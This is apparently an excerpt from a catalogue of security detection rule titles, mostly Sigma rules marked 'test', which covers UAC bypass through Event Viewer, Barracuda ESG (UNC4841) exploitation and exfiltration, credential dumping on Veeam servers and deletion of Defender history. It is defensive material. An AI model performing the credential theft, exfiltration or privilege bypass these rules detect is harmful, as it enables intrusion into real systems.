- Sigma UAC Bypass Using Event Viewer RecentViews test
- Sigma UAC Bypass Using EventVwr test
- Sigma UNC4841 - Barracuda ESG Exploitation Indicators test
- Sigma UNC4841 - Email Exfiltration File Pattern test
- Sigma UNC4841 - Potential SEASPY Execution test
- Sigma Uncommon Child Processes Of SndVol.exe test
- Sigma Uncommon File Creation By Mysql Daemon Process test
- Sigma Uncommon FileSystem Load Attempt By Format.com test
- Sigma Unsigned AppX Installation Attempt Using Add-AppxPackage test
- Sigma Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScript test
- Splunk Unusually Long Command Line experimental
- Sigma Veeam Backup Servers Credential Dumping Script Execution test
- Sigma Visual Studio Code Tunnel Remote File Creation test
- Sigma VsCode Code Tunnel Execution File Indicator test
- Sigma Wab Execution From Non Default Location test
- Sigma Wab/Wabmig Unusual Parent Or Child Processes test
- Sigma Weak or Abused Passwords In CLI test
- Sigma Windows Defender Malware Detection History Deletion test
- Sigma Windows Kernel Debugger Execution test
- Sigma Windows Service Terminated With Error test
- YARA-L Windows Short Term Account Use
- Sigma Winget Admin Settings Modification test
- Sigma WinSxS Executable File Creation By Non-System Process test
- Sigma Wusa.EXE Executed By Parent Process Located In Suspicious Location test